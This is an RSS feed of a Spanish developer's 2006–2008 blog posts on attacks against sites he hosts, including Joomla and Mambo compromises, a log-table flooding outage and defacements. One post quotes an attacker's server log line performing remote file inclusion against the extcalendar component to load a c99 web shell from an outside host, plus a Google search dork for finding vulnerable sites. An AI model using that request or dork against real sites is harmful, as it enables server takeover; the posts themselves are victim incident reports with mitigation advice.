<?xml version="1.0" encoding="utf-8"?><?xml-stylesheet type='text/xsl' href='http://juanbelon.spaces.live.com/mmm2008-07-17_13.29/rsspretty.aspx?rssquery=en-US;http%3a%2f%2fjuanbelon.spaces.live.com%2fcategory%2fHacking%2ffeed.rss' version='1.0'?><rss version="2.0" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" xmlns:msn="http://schemas.microsoft.com/msn/spaces/2005/rss" xmlns:live="http://schemas.microsoft.com/live/spaces/2006/rss" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:cf="http://www.microsoft.com/schemas/rss/core/2005" xmlns:wfw="http://wellformedweb.org/CommentAPI/"><channel><title>Programador analista de sistemas web: Hacking</title><description /><link>http://juanbelon.spaces.live.com/?_c11_BlogPart_BlogPart=blogview&amp;_c=BlogPart&amp;partqs=catHacking</link><language>en-US</language><pubDate>Sun, 20 Jul 2008 17:06:07 GMT</pubDate><lastBuildDate>Sun, 20 Jul 2008 17:06:07 GMT</lastBuildDate><generator>Microsoft Spaces v1.1</generator><docs>http://www.rssboard.org/rss-specification</docs><ttl>60</ttl><cf:parentRSS>http://juanbelon.spaces.live.com/blog/feed.rss</cf:parentRSS><live:type>blogcategory</live:type><live:identity><live:id>-5345016895081830816</live:id><live:alias>juanbelon</live:alias></live:identity><cf:listinfo><cf:group ns="http://schemas.microsoft.com/live/spaces/2006/rss" element="typelabel" label="Type" /><cf:group ns="http://schemas.microsoft.com/live/spaces/2006/rss" element="tag" label="Tag" /><cf:group element="category" label="Category" /><cf:sort element="pubDate" label="Date" data-type="date" default="true" /><cf:sort element="title" label="Title" data-type="string" /><cf:sort ns="http://purl.org/rss/1.0/modules/slash/" element="comments" label="Comments" data-type="number" /></cf:listinfo><item><title>Ataques de spammers</title><link>http://juanbelon.spaces.live.com/Blog/cns!B5D2AF73FA2FA660!1278.entry</link><description>Ataques de spammers intentan colapsar los servidores donde alojo páginas web,no se cansan esta gente...&lt;img src="http://c.services.spaces.live.com/CollectionWebService/c.gif?cid=-5345016895081830816&amp;page=RSS%3a+Ataques+de+spammers&amp;referrer=" width="1px" height="1px" border="0" alt=""&gt;&lt;img style="position:absolute" alt="" width="0px" height="0px" src="http://c.live.com/c.gif?NC=31263&amp;amp;NA=1149&amp;amp;PI=73329&amp;amp;RF=&amp;amp;DI=3919&amp;amp;PS=85545&amp;amp;TP=juanbelon.spaces.live.com&amp;amp;GT1=juanbelon"&gt;</description><comments>http://juanbelon.spaces.live.com/Blog/cns!B5D2AF73FA2FA660!1278.entry#comment</comments><guid isPermaLink="true">http://juanbelon.spaces.live.com/Blog/cns!B5D2AF73FA2FA660!1278.entry</guid><pubDate>Mon, 02 Jun 2008 12:25:50 GMT</pubDate><slash:comments>0</slash:comments><msn:type>blogentry</msn:type><live:type>blogentry</live:type><live:typelabel>Blog entry</live:typelabel><wfw:commentRss>http://juanbelon.spaces.live.com/blog/cns!B5D2AF73FA2FA660!1278/comments/feed.rss</wfw:commentRss><wfw:comment>http://juanbelon.spaces.live.com/Blog/cns!B5D2AF73FA2FA660!1278.entry#comment</wfw:comment><dcterms:modified>2008-06-02T12:25:50Z</dcterms:modified></item><item><title>Ataque a la web del grupo de reggae Soldiers</title><link>http://juanbelon.spaces.live.com/Blog/cns!B5D2AF73FA2FA660!1273.entry</link><description>&lt;div&gt;Un nuevo intento de pirateo de un servidor...&lt;/div&gt;
&lt;div&gt;El fallo usado esta vez para tumbar el servidor fue una excesiva generación de errores en el foro &amp;quot;SMF&amp;quot; vinculado a Joomla (otra vez tu!), que hacia que los logs que se almacenan en la tabla asociada de este foro aumentara mucho...hasta alcanzar el límite establecido...además, la CPU se sobrecargaba por tener tantos eventos de error a guardar...es decir, ...ataques de distintos orígenes que llegaban a llenar casi 300MB de datos en pocas horas ,satura el motor MySQL hasta hacer caer el servidor...&lt;/div&gt;
&lt;div&gt;Asi que ya sabeis , no actives la opción de guardar logs en MySQL,...no guardaría ni las sesiones, ya que el límite de espacio de los servidores de bases de datos suelen ser inferiores a los de espacio por quota de ficheros...&lt;/div&gt;
&lt;div&gt;Saludos!&lt;/div&gt;&lt;img src="http://c.services.spaces.live.com/CollectionWebService/c.gif?cid=-5345016895081830816&amp;page=RSS%3a+Ataque+a+la+web+del+grupo+de+reggae+Soldiers&amp;referrer=" width="1px" height="1px" border="0" alt=""&gt;&lt;img style="position:absolute" alt="" width="0px" height="0px" src="http://c.live.com/c.gif?NC=31263&amp;amp;NA=1149&amp;amp;PI=73329&amp;amp;RF=&amp;amp;DI=3919&amp;amp;PS=85545&amp;amp;TP=juanbelon.spaces.live.com&amp;amp;GT1=juanbelon"&gt;</description><comments>http://juanbelon.spaces.live.com/Blog/cns!B5D2AF73FA2FA660!1273.entry#comment</comments><guid isPermaLink="true">http://juanbelon.spaces.live.com/Blog/cns!B5D2AF73FA2FA660!1273.entry</guid><pubDate>Sun, 01 Jun 2008 22:06:59 GMT</pubDate><slash:comments>0</slash:comments><msn:type>blogentry</msn:type><live:type>blogentry</live:type><live:typelabel>Blog entry</live:typelabel><wfw:commentRss>http://juanbelon.spaces.live.com/blog/cns!B5D2AF73FA2FA660!1273/comments/feed.rss</wfw:commentRss><wfw:comment>http://juanbelon.spaces.live.com/Blog/cns!B5D2AF73FA2FA660!1273.entry#comment</wfw:comment><dcterms:modified>2008-06-01T22:06:59Z</dcterms:modified></item><item><title>Hackers rusos se lo pasan en grande</title><link>http://juanbelon.spaces.live.com/Blog/cns!B5D2AF73FA2FA660!936.entry</link><description>&lt;div&gt;

&lt;div&gt;Mi socio mientras buscaba en google cosas, encontró que unos hackers rusos estaban de vacaciones por las webs españolas, eso si, dejando su &amp;quot;marca&amp;quot;...&lt;/div&gt;
&lt;div&gt;y que conste q no me alegro de q le vaya mal a la competencia!.&lt;/div&gt;
&lt;div&gt;firewalking  y empresayweb&lt;/div&gt;
&lt;div&gt;a seguir pillandolos!!&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;table cellspacing="0" border="0"&gt;&lt;tr height="8"&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td valign="top"&gt;&lt;p&gt;&lt;a href="http://blufiles.storage.live.com&amp;#47;y1piK83J5hChAiFf_KNUHf45-ycmRrnYjcKx3Ec2RKDDZxcVOxHnkBrme1B-HQiU_ub"&gt;&lt;img src="http://storage.live.com&amp;#47;items&amp;#47;B5D2AF73FA2FA660&amp;#33;937&amp;#58;thumbnail" border="0"&gt;&lt;/a&gt;&lt;/p&gt;&lt;/td&gt;&lt;td width="15"&gt;&lt;/td&gt;&lt;td valign="top"&gt;&lt;p&gt;&lt;a href="http://blufiles.storage.live.com&amp;#47;y1pfe1m8p_8tf_aSAlzOLu2ABq1zFaJVuUWXsU-G7DMm2YB1Qv0177bigWjSNJh6HoX"&gt;&lt;img src="http://storage.live.com&amp;#47;items&amp;#47;B5D2AF73FA2FA660&amp;#33;938&amp;#58;thumbnail" border="0"&gt;&lt;/a&gt;&lt;/p&gt;&lt;/td&gt;&lt;td width="15"&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/div&gt;&lt;img src="http://c.services.spaces.live.com/CollectionWebService/c.gif?cid=-5345016895081830816&amp;page=RSS%3a+Hackers+rusos+se+lo+pasan+en+grande&amp;referrer=" width="1px" height="1px" border="0" alt=""&gt;&lt;img style="position:absolute" alt="" width="0px" height="0px" src="http://c.live.com/c.gif?NC=31263&amp;amp;NA=1149&amp;amp;PI=73329&amp;amp;RF=&amp;amp;DI=3919&amp;amp;PS=85545&amp;amp;TP=juanbelon.spaces.live.com&amp;amp;GT1=juanbelon"&gt;</description><comments>http://juanbelon.spaces.live.com/Blog/cns!B5D2AF73FA2FA660!936.entry#comment</comments><guid isPermaLink="true">http://juanbelon.spaces.live.com/Blog/cns!B5D2AF73FA2FA660!936.entry</guid><pubDate>Mon, 30 Apr 2007 17:58:59 GMT</pubDate><slash:comments>0</slash:comments><msn:type>blogentry</msn:type><live:type>blogentry</live:type><live:typelabel>Blog entry</live:typelabel><wfw:commentRss>http://juanbelon.spaces.live.com/blog/cns!B5D2AF73FA2FA660!936/comments/feed.rss</wfw:commentRss><wfw:comment>http://juanbelon.spaces.live.com/Blog/cns!B5D2AF73FA2FA660!936.entry#comment</wfw:comment><dcterms:modified>2007-05-08T09:52:43Z</dcterms:modified></item><item><title>Problemas de seguridad en www.soldiers-reggaeband.com</title><link>http://juanbelon.spaces.live.com/Blog/cns!B5D2AF73FA2FA660!920.entry</link><description>&lt;div&gt;De nuevo he sido víctima de un problema de seguridad de un componente de Joomla, en esta ocasión ha sido un componente de calendarios, &amp;quot;extcalendar&amp;quot;, el hacker en cuestión, parece ser checo ,vino buscando el componente por google &lt;br&gt;&lt;a href="http://www.google.it/search?q=+&amp;quot;inurl:index+php+option+com_extcalendar&amp;quot;&amp;amp;num=100&amp;amp;hl=it&amp;amp;lr=&amp;amp;as_qdr=all&amp;amp;start=100&amp;amp;sa=N"&gt;&lt;u&gt;&lt;font color="#0000ff"&gt;http://www.google.it/search?q=+%22inurl:index+php+option+com_extcalendar%22&amp;amp;num=100&amp;amp;hl=it&amp;amp;lr=&amp;amp;as_qdr=all&amp;amp;start=100&amp;amp;sa=N&lt;/font&gt;&lt;/u&gt;&lt;/a&gt; &lt;br&gt;encontrando la web donde estaba, a partir de ahi usa 1 programa en php q intenta usar la SHELL (consola de linux), por suerte la seguridad del servidor no permite ejecutar scripts con la instruccion exec() y no llegó demasiado lejos...&lt;br&gt;62.168.125.217 - - [10/Apr/2007:20:08:21 +0200] &amp;quot;GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=&lt;a href="http://crashz.by.ru/shell/c99.txt?cmd"&gt;&lt;u&gt;&lt;font color="#0000ff"&gt;http://crashz.by.ru/shell/c99.txt?cmd&lt;/font&gt;&lt;/u&gt;&lt;/a&gt; HTTP/1.0&amp;quot; 200 33872 &amp;quot;-&amp;quot; &amp;quot;Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)&amp;quot; &lt;br&gt;ésa es la web de exploits ,evidentemente el hacker está usando un proxy-server...&lt;/div&gt;
&lt;div&gt;Intentando varios scripts a lo largo de la tarde desde otras direcciones&lt;/div&gt;
&lt;div&gt;&lt;a href="http://www.a77web.it/aggiornamenti/a.txt"&gt;&lt;u&gt;&lt;font color="#0000ff"&gt;http://www.a77web.it/aggiornamenti/a.txt&lt;/font&gt;&lt;/u&gt;&lt;/a&gt;? &lt;br&gt;llegó a conseguir enviar correos de spam, desde aquí me gustaría hacer la petición de ayuda para recuperar puestos en los servidores antispam, es decir, dejar de estar marcado como servidor de correo basura, si alguien lo sabe, le agradecería mucho sus conocimientos :)...&lt;br&gt; &lt;/div&gt;
&lt;div&gt;Y al final va a ser verdad que la seguridad no existe... &lt;a href="http://www.soldiers-reggaeband.com"&gt;www.soldiers-reggaeband.com&lt;/a&gt;&lt;/div&gt;
&lt;div&gt; &lt;/div&gt;
&lt;div&gt;Por cierto, el tema fue tratado por la policía y se consiguió parar al hacker tan pronto como se detectó...&lt;br&gt;Tomad nota, quitar la libreria de mail del componente de Joomla extcalendar en /components/com_extcalendar/lib/mail.inc.php y quitar los permisos de añadir eventos...o mejor ni siquiera instaleis el componente...&lt;/div&gt;
&lt;div&gt;Saludos...&lt;/div&gt;&lt;img src="http://c.services.spaces.live.com/CollectionWebService/c.gif?cid=-5345016895081830816&amp;page=RSS%3a+Problemas+de+seguridad+en+www.soldiers-reggaeband.com&amp;referrer=" width="1px" height="1px" border="0" alt=""&gt;&lt;img style="position:absolute" alt="" width="0px" height="0px" src="http://c.live.com/c.gif?NC=31263&amp;amp;NA=1149&amp;amp;PI=73329&amp;amp;RF=&amp;amp;DI=3919&amp;amp;PS=85545&amp;amp;TP=juanbelon.spaces.live.com&amp;amp;GT1=juanbelon"&gt;</description><comments>http://juanbelon.spaces.live.com/Blog/cns!B5D2AF73FA2FA660!920.entry#comment</comments><guid isPermaLink="true">http://juanbelon.spaces.live.com/Blog/cns!B5D2AF73FA2FA660!920.entry</guid><pubDate>Sun, 15 Apr 2007 21:55:50 GMT</pubDate><slash:comments>0</slash:comments><msn:type>blogentry</msn:type><live:type>blogentry</live:type><live:typelabel>Blog entry</live:typelabel><wfw:commentRss>http://juanbelon.spaces.live.com/blog/cns!B5D2AF73FA2FA660!920/comments/feed.rss</wfw:commentRss><wfw:comment>http://juanbelon.spaces.live.com/Blog/cns!B5D2AF73FA2FA660!920.entry#comment</wfw:comment><dcterms:modified>2007-04-15T21:55:50Z</dcterms:modified></item><item><title>Makina de cocacola...bebidas gratis?</title><link>http://juanbelon.spaces.live.com/Blog/cns!B5D2AF73FA2FA660!739.entry</link><description>&lt;div&gt;He subido un video en youtube: &lt;a href="http://www.youtube.com/watch?v=Xzs7dzks3W8"&gt;http://www.youtube.com/watch?v=Xzs7dzks3W8&lt;/a&gt; grabado en un sitio conocido :) con una mákina de cocacola,probando lo que se dice en la web de i-hacking.com y parece que funciona,lástima que no haya códigos para reconfigurar la máquina disponibles...&lt;img src="http://tk.files.storage.msn.com/x1pxzZ39wV--_cKEo13dVo66mMcFa29FFwYEmOEm2j9aucLx3F-O2OZ5ortRgHAIik0IMEYdpyfRgn9KsyxHe8fxKxg1RPeOWbXMv731DBEyh6S2dIu_v6bJ49j8GC7_VU1GjeI9mB_oKs"&gt;&lt;/div&gt;
&lt;div&gt;Otra cosa interesante es lo que se ha inventado el hombre de esa web...coge un cable USB y le deja solo la parte de la corriente, para poder escuchar mientras se recarga con el pc enchufado...cuando ,al menos en mi modelo,basta enchufarlo y desde iTunes hacer un &amp;quot;desmontar&amp;quot; y tienes lo mismo pero sin hacerte el cable...a veces se le va la olla XD&lt;/div&gt;
&lt;div&gt; &lt;/div&gt;&lt;div&gt;&lt;table cellspacing="0" border="0"&gt;&lt;tr height="8"&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td valign="top"&gt;&lt;p&gt;&lt;a href="http://blufiles.storage.live.com&amp;#47;y1pwgLxYgmE5gkv94LovMocg8BrdRwXTkg7zR_iqciyL1sZqAHglXBJNnZDR1Bcw8mg"&gt;&lt;img src="http://storage.live.com&amp;#47;items&amp;#47;B5D2AF73FA2FA660&amp;#33;740&amp;#58;thumbnail" border="0"&gt;&lt;/a&gt;&lt;/p&gt;&lt;/td&gt;&lt;td width="15"&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/div&gt;&lt;img src="http://c.services.spaces.live.com/CollectionWebService/c.gif?cid=-5345016895081830816&amp;page=RSS%3a+Makina+de+cocacola...bebidas+gratis%3f&amp;referrer=" width="1px" height="1px" border="0" alt=""&gt;&lt;img style="position:absolute" alt="" width="0px" height="0px" src="http://c.live.com/c.gif?NC=31263&amp;amp;NA=1149&amp;amp;PI=73329&amp;amp;RF=&amp;amp;DI=3919&amp;amp;PS=85545&amp;amp;TP=juanbelon.spaces.live.com&amp;amp;GT1=juanbelon"&gt;</description><comments>http://juanbelon.spaces.live.com/Blog/cns!B5D2AF73FA2FA660!739.entry#comment</comments><guid isPermaLink="true">http://juanbelon.spaces.live.com/Blog/cns!B5D2AF73FA2FA660!739.entry</guid><pubDate>Wed, 14 Jun 2006 22:44:25 GMT</pubDate><slash:comments>0</slash:comments><msn:type>blogentry</msn:type><live:type>blogentry</live:type><live:typelabel>Blog entry</live:typelabel><wfw:commentRss>http://juanbelon.spaces.live.com/blog/cns!B5D2AF73FA2FA660!739/comments/feed.rss</wfw:commentRss><wfw:comment>http://juanbelon.spaces.live.com/Blog/cns!B5D2AF73FA2FA660!739.entry#comment</wfw:comment><dcterms:modified>2006-06-14T22:46:47Z</dcterms:modified></item><item><title>Senseidav.com hackeada</title><link>http://juanbelon.spaces.live.com/Blog/cns!B5D2AF73FA2FA660!688.entry</link><description>&lt;div&gt;La historia empezó cuando quise desarrollar un pequeño juego para &lt;a href="http://www.sms.ac"&gt;www.sms.ac&lt;/a&gt; como developer, o sea, desarrollador...claro, necesitabas un sitio donde hospedar el juego que no fuera esa web...y usé el dominio de mi hermano &lt;a href="http://www.senseidav.com"&gt;www.senseidav.com&lt;/a&gt; ...la cosa es que no sabia si realmente estaba triunfando una vez hice la primera versión...,tampoco me importaba demasiado. Además había que pagar una cuota al mes para que el plugin funcionara dentro de la web de mensajería...&lt;/div&gt;
&lt;div&gt; &lt;/div&gt;
&lt;div&gt;Cierto día dejó de funcionar la web de arte, no me di cuenta de ello pero mi hermano si, que me avisó...total, que me pongo a revisar la configuración y parece ser que algún graciosillo había borrado las plantillas de la web, la web ,usaba el gestor de contenido Mambo.&lt;/div&gt;
&lt;div&gt; &lt;/div&gt;
&lt;div&gt;Después de mucho cavilar me doy cuenta de que ésta versión del famoso CMS (gestor de contenidos) tiene un agujero de seguridad con el que puedes sobreescribir la configuración y entrar como administrador!, vaya tela...&lt;/div&gt;
&lt;div&gt;El caso es que, viendo los logs de acceso al servidor senseidav,justo después de usar el juego de sms.ac el hacker se pone a jugar con la web y al final se la carga...la información que me devuelve un whois de la IP del atacante dice provenir de Amsterdam...estaría fumado?&lt;/div&gt;
&lt;div&gt;Al final hemos decidido borrar el gestor de contenidos y hacer el código a mano. :) seguro que así no hay ningún problema, de hecho nunca lo he tenido cuando he escrito mi propio código y así es como debe seguir! &lt;/div&gt;&lt;img src="http://c.services.spaces.live.com/CollectionWebService/c.gif?cid=-5345016895081830816&amp;page=RSS%3a+Senseidav.com+hackeada&amp;referrer=" width="1px" height="1px" border="0" alt=""&gt;&lt;img style="position:absolute" alt="" width="0px" height="0px" src="http://c.live.com/c.gif?NC=31263&amp;amp;NA=1149&amp;amp;PI=73329&amp;amp;RF=&amp;amp;DI=3919&amp;amp;PS=85545&amp;amp;TP=juanbelon.spaces.live.com&amp;amp;GT1=juanbelon"&gt;</description><comments>http://juanbelon.spaces.live.com/Blog/cns!B5D2AF73FA2FA660!688.entry#comment</comments><guid isPermaLink="true">http://juanbelon.spaces.live.com/Blog/cns!B5D2AF73FA2FA660!688.entry</guid><pubDate>Tue, 28 Feb 2006 22:14:29 GMT</pubDate><slash:comments>2</slash:comments><msn:type>blogentry</msn:type><live:type>blogentry</live:type><live:typelabel>Blog entry</live:typelabel><wfw:commentRss>http://juanbelon.spaces.live.com/blog/cns!B5D2AF73FA2FA660!688/comments/feed.rss</wfw:commentRss><wfw:comment>http://juanbelon.spaces.live.com/Blog/cns!B5D2AF73FA2FA660!688.entry#comment</wfw:comment><dcterms:modified>2006-02-28T22:14:29Z</dcterms:modified></item></channel></rss>